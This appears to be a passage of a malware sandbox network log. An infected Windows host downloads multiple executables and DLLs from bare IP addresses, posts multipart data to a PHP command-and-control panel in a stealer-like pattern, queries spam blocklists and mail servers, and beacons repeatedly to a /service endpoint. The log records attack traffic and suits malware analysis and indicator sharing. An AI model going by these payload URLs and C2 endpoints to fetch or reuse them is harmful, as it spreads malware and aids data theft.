Last-Modified: Fri, 28 Mar 2025 06:53:45 GMT
Connection: keep-alive
ETag: "67e64779-140c00"
Accept-Ranges: bytes
DNS

microsoft.com

Remote address:

8.8.8.8:53

Request

microsoft.com

IN A

Response

microsoft.com

IN A

13.107.246.59
DNS

microsoft.com

Remote address:

8.8.8.8:53

Request

microsoft.com

IN MX

Response

microsoft.com

IN MX

microsoft-commail protectionoutlook�
DNS

microsoft-com.mail.protection.outlook.com

Remote address:

8.8.8.8:53

Request

microsoft-com.mail.protection.outlook.com

IN A

Response

microsoft-com.mail.protection.outlook.com

IN A

52.101.40.26

microsoft-com.mail.protection.outlook.com

IN A

52.101.11.0

microsoft-com.mail.protection.outlook.com

IN A

52.101.42.0

microsoft-com.mail.protection.outlook.com

IN A

52.101.8.49
DNS

microsoft-com.mail.protection.outlook.com

Remote address:

8.8.8.8:53

Request

microsoft-com.mail.protection.outlook.com

IN A
DNS

c.pki.goog

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.195
GET

http://c.pki.goog/r/r1.crl

Remote address:

142.250.187.195:80

Request

GET /r/r1.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 304 Not Modified

Date: Sat, 29 Mar 2025 01:31:00 GMT
Expires: Sat, 29 Mar 2025 02:21:00 GMT
Age: 17
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding
DNS

gogo.fechrise.fun

Remote address:

8.8.8.8:53

Request

gogo.fechrise.fun

IN A

Response

gogo.fechrise.fun

IN A

2.59.41.142
DNS

indro.top

Remote address:

8.8.8.8:53

Request

indro.top

IN A

Response

indro.top

IN A

46.173.214.156
GET

http://107.174.192.179/data/003

Remote address:

107.174.192.179:80

Request

GET /data/003 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Sat, 29 Mar 2025 01:31:21 GMT
Content-Type: application/octet-stream
Content-Length: 2050048
Last-Modified: Fri, 28 Mar 2025 06:51:27 GMT
Connection: keep-alive
ETag: "67e646ef-1f4800"
Accept-Ranges: bytes
GET

http://107.174.192.179/clean

Remote address:

107.174.192.179:80

Request

GET /clean HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Sat, 29 Mar 2025 01:31:23 GMT
Content-Type: application/octet-stream
Content-Length: 1400832
Last-Modified: Sat, 22 Mar 2025 01:09:32 GMT
Connection: keep-alive
ETag: "67de0dcc-156000"
Accept-Ranges: bytes
DNS

147.63.102.212.dnsbl.sorbs.net

Remote address:

8.8.8.8:53

Request

147.63.102.212.dnsbl.sorbs.net

IN A

Response
DNS

147.63.102.212.bl.spamcop.net

Remote address:

8.8.8.8:53

Request

147.63.102.212.bl.spamcop.net

IN A

Response
DNS

147.63.102.212.zen.spamhaus.org

Remote address:

8.8.8.8:53

Request

147.63.102.212.zen.spamhaus.org

IN A

Response
DNS

147.63.102.212.sbl-xbl.spamhaus.org

Remote address:

8.8.8.8:53

Request

147.63.102.212.sbl-xbl.spamhaus.org

IN A

Response
DNS

147.63.102.212.cbl.abuseat.org

Remote address:

8.8.8.8:53

Request

147.63.102.212.cbl.abuseat.org

IN A

Response
GET

http://176.113.115.7/files/7033027882/TbV75ZR.exe

Remote address:

176.113.115.7:80

Request

GET /files/7033027882/TbV75ZR.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 17:35:14 GMT
ETag: "f7c00-6316a7e364866"
Accept-Ranges: bytes
Content-Length: 1014784
Content-Type: application/x-msdos-program
DNS

grabify.link

Remote address:

8.8.8.8:53

Request

grabify.link

IN A

Response

grabify.link

IN A

104.26.8.202

grabify.link

IN A

104.26.9.202

grabify.link

IN A

172.67.68.246
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-kE2HE5hF-v34qEEBjzlYyw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2c8DarW_BsICRK0vX9HDkksOe3CLNgUmRM-Op2vPElHf7TUCzeMQg; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ihPLuVvueDIK5TSDoFL1jQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2cWVC9xIy1X9ONg_f9l7p1yBV7oM74sSHMNf8uh6QyN3S_JrZIvmAg; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-aYUWdEsCtyUFSseYjAyAUA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2fZ9foOU74qIWPY1lZfyJlOK2EW9SE2OZVnTPk8Xv-vFDBpJVoj1A; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-HjvosTReNOCZXDb5DGH6vQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2enFwB0_vF4Z8ch6sHc75wUxeZ0IblB_DsdlIFDhBG5JHXfaqz5Dg; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-WK6crW5cXq7hX4MPRBFXGQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2dBDNDBE4DBH7NtXhSDDdqBx0xdTGEe02d8uJU7rVaeiL4cq14vMQ; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-YBBhI5ZKSsb4hkpzxK7IhA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2fB4gSBt65HMiB2waW6q30fj8jWoICfh0Oy82-1C6hmCk9eIDURbHA; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

Request

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-uJaax6RK0vWLRokM7Hi8ZA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Content-Encoding: gzip
Server: gws
Content-Length: 1885
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2eQZpvmcFCxA0gsC9LM41XAGIhKW--7artITg_zfzLYx4W8egkQzXI; expires=Thu, 25-Sep-2025 01:31:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://77.90.153.244/l9543.exe

Request

GET /l9543.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: 77.90.153.244
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:33 GMT
Content-Type: application/octet-stream
Content-Length: 870912
Last-Modified: Fri, 28 Mar 2025 20:46:21 GMT
Connection: keep-alive
ETag: "67e70a9d-d4a00"
Accept-Ranges: bytes
GET

http://77.90.153.244/s9471.exe

Request

GET /s9471.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: 77.90.153.244
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:36 GMT
Content-Type: application/octet-stream
Content-Length: 754176
Last-Modified: Fri, 28 Mar 2025 20:46:21 GMT
Connection: keep-alive
ETag: "67e70a9d-b8200"
Accept-Ranges: bytes
GET

http://77.90.153.244/sss81242.exe

Request

GET /sss81242.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: 77.90.153.244
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:37 GMT
Content-Type: application/octet-stream
Content-Length: 257536
Last-Modified: Thu, 13 Mar 2025 14:06:58 GMT
Connection: keep-alive
ETag: "67d2e682-3ee00"
Accept-Ranges: bytes
GET

http://185.156.73.98/success?substr=mixfour&s=three&sub=none

Request

GET /success?substr=mixfour&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

wxayfarer.live

Request

wxayfarer.live

IN A

Response
DNS

byteplusx.digital

Request

byteplusx.digital

IN A

Response
DNS

travewlio.shop

Request

travewlio.shop

IN A

Response
DNS

skynetxc.live

Request

skynetxc.live

IN A

Response
DNS

pixtreev.run

Request

pixtreev.run

IN A

Response
GET

http://176.113.115.7/files/fate/random.exe

Request

GET /files/fate/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 25 Mar 2025 18:10:04 GMT
ETag: "119c00-6312ea1425700"
Accept-Ranges: bytes
Content-Length: 1154048
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/files/teamex_support/random.exe

Request

GET /files/teamex_support/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:42 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 28 Mar 2025 23:53:55 GMT
ETag: "1cb000-6316fc88bb88b"
Accept-Ranges: bytes
Content-Length: 1880064
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/luma/random.exe

Request

GET /luma/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:38:23 GMT
ETag: "2d6e00-63170678e8ba6"
Accept-Ranges: bytes
Content-Length: 2977280
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/steam/random.exe

Request

GET /steam/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:38:51 GMT
ETag: "1ace00-631706932955d"
Accept-Ranges: bytes
Content-Length: 1756672
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/well/random.exe

Request

GET /well/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:59 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:37:19 GMT
ETag: "eca00-6317063b2f31c"
Accept-Ranges: bytes
Content-Length: 969216
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/off/random.exe

Request

GET /off/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:37:55 GMT
ETag: "1b0c00-6317065e27375"
Accept-Ranges: bytes
Content-Length: 1772544
Content-Type: application/x-msdos-program
GET

http://77.90.153.241/

Request

GET / HTTP/1.1
Host: 77.90.153.241
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAF
Host: 77.90.153.241
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJ
Host: 77.90.153.241
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2028
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJE
Host: 77.90.153.241
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGDHIEGCFHCGDGCAECBG
Host: 77.90.153.241
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
Host: 77.90.153.241
Content-Length: 5415
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://77.90.153.241/a07daa7aeaf96e14/sqlite3.dll

Request

GET /a07daa7aeaf96e14/sqlite3.dll HTTP/1.1
Host: 77.90.153.241
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
DNS

www.instagram.com

Request

www.instagram.com

IN A

Response

www.instagram.com

IN CNAME

z-p42-instagram.c10r.instagram.com

z-p42-instagram.c10r.instagram.com

IN A

163.70.147.174
DNS

yahoo.com

Request

yahoo.com

IN MX

Response

yahoo.com

IN MX

mta5am0yahoodnsnet

yahoo.com

IN MX

mta7�.

yahoo.com

IN MX

mta6�.
GET

http://185.156.73.98/info

Request

GET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:40 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/update

Request

GET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:40 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:41 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:45 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:48 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:55 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
